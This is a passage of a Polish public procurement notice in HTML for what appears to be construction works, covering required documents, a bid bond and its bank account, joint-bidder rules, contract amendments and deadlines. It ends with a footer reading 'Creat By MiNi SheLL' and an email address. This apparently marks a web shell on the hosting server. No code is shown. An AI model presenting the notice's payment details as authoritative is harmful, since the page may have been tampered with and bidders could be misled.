albo podmiotu udostepniającego zasoby <br/>na zasadach określonych w art. 118 ustawy Pzp – jeżeli umocowanie <br/>do reprezentowania przez osobę działającą w imieniu Wykonawcy albo Wykonawców wspólnie ubiegających się o udzielenie zamówienia albo podmiotu udostepniającego zasoby nie wynika z dokumentów, o których mowa w pkt 4;<br/>6)	dowód wniesienia wadium.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania - odpis lub<br/>informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego<br/>właściwego rejestru;<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy albo Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia – jeżeli umocowanie do reprezentowania przez osobę działającą w<br/>imieniu Wykonawcy albo Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie wynika z dokumentów, o<br/>których mowa w pkt 1. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium w kwocie 5.000,00 zł<br/>(słownie: pięć tysięcy złotych 0/100). Wadium należy wnieść przed upływem terminu składania ofert.<br/>2.	Wadium może być wniesione – według wyboru Wykonawcy – w jednej lub kilku poniższych formach:<br/>1)	pieniądzu – przelewem na rachunek bankowy Zamawiającego: Powszechna Kasa Oszczędności Bank Polski Spółka Akcyjna nr: 85 1020 5226 0000 6002 0681 3671;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 <br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>Szczegóły dot. wniesienia wadium zawarte są Dziale XXVIII SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>2.	Do oferty wspólnej winno być dołączone pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>3.	Korespondencja w postępowaniu będzie prowadzona z podmiotem występującym jako pełnomocnik. <br/>4.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>5.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki udziału w postępowaniu, określone w ust. 1 pkt 2 lit. d Działu X SWZ, musi spełniać co najmniej jeden Wykonawca. Warunek, o którym mowa w ust. 1 pkt 2 lit. d.1 Działu X SWZ, nie podlega sumowaniu, tj. Zamawiający nie dopuszcza sumowania potencjału (łączenia doświadczenia). <br/>6.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wskazanych w ust. 1 pkt 2 lit. d Działu X SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, w którym należy wskazać, które roboty budowlane lub usługi wykonają poszczególni Wykonawcy (wzór oświadczenia stanowi Załącznik Nr 13 do SWZ). <br/>7.	Każdy z Wykonawców wspólnie ubiegających się o zamówienie odrębnie składa oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (Załącznik Nr 2 do SWZ). Oświadczenia te należy złożyć wraz z ofertą. <br/>8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy. <br/>9.	W przypadku wyboru oferty Wykonawców wnoszących ją wspólnie, Zamawiający zażąda przed zawarciem umowy w sprawie zamówienia kopii umowy regulującej współpracę tych Wykonawców. <br/>10.	Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań dotyczących przedmiotowego zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, zostały określone w Załączniku Nr 4 do Specyfikacji Warunków Zamówienia.<br/>2.	Dopuszczalne są zmiany zawartej umowy w zakresie uregulowanym w art. 454-455 ustawy Pzp.3.Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp, Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie dotyczącym zmiany:1)wynagrodzenia należnego Wykonawcy – w przypadku zmiany w trakcie trwania umowy przepisów w zakresie stawki podatku od towarów i usług;2)terminu realizacji przedmiotu zamówienia – jeżeli wynika to z okoliczności uniemożliwiających wykonanie przedmiotu zamówienia w ustalonym terminie, w przypadku:a)wystąpienia siły wyższej – rozumianej jako wystąpienie zdarzenia nadzwyczajnego, zewnętrznego, niemożliwego do przewidzenia i zapobieżenia, którego nie dało się uniknąć nawet przy zachowaniu najwyższej staranności, a które uniemożliwia Wykonawcy wykonanie przedmiotu zamówienia w pierwotnym terminie – takiej jak w szczególności: katastrofa naturalna, katastrofa w ruchu powietrznym lub lądowym, klęska żywiołowa, działania wojenne, terroryzm, zamieszki, strajk spowodowany przez osoby niezwiązane z realizacją przedmiotu zamówienia, warunki atmosferyczne, np.: huragany, trzęsienia ziemi, intensywne lub długotrwałe opady deszczu lub śniegu, powodzie, podtopienia – powodujące konieczność wstrzymania prac z przyczyn technologicznych;b)zmiany spowodowanej warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi itp., w szczególności w przypadku wstrzymania robót przez uprawnione podmioty w związku ze stwierdzeniem występowania urządzeń lub instalacji, które nie były ujawnione na etapie zawierania umowy, lub z uwagi na konieczność przeprowadzenia prac archeologicznych lub innych prac, których wykonanie wstrzymuje realizację i zakończenie robót stanowiących przedmiot zamówienia;<br/>c)konieczności usunięcia błędów lub wprowadzenia zmian w przyjętej do realizacji dokumentacji technicznej;d)przedłużania się procedur administracyjnych – w przypadku konieczności uzyskania od organów administracyjnych wymaganych przepisami prawa decyzji, zezwoleń czy uzgodnień, w związku z ujawnionymi błędami w dokumentacji technicznej<br/>w szczególności w związku z wejściem w życie przepisów krajowych lub międzynarodowych, skutkujących wydłużeniem lub zawieszeniem terminów na wydanie w/w dokumentów;e)konieczności uzyskania wyroku sądowego lub innego orzeczenia sądu;<br/>Szczegółowy opis zawarty jest w Dziale XVII SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-05 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na miniPortalu (https://miniportal.uzp.gov.pl/) oraz na ePUAP (https://epuap.gov.pl/wps/portal lubhttps://obywatel.gov.pl/nforms/ezamowienia).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-05 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-03</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> nie dotyczy (nie ogranicza się liczby wykonawców) <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 3.	Przed podpisaniem umowy Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zobowiązany jest przedłożyć Zamawiającemu potwierdzoną za zgodność z oryginałem kserokopię uprawnień budowlanych dotyczących osoby wyznaczonej do pełnienia funkcji Kierownika budowy (zgodnie z wymaganiami określonymi przez Zamawiającego w Dziale X SWZ) oraz zaświadczenie o członkostwie tej osoby we właściwej izbie samorządu zawodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com